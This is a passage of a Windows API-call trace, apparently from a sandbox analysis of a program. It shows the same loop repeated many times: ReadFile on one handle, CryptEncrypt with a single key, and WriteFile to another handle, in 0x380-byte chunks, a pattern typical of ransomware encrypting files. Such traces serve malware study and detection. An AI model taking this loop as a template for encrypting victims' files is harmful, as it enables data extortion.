pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.184] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.185] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.186] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.187] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.188] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, 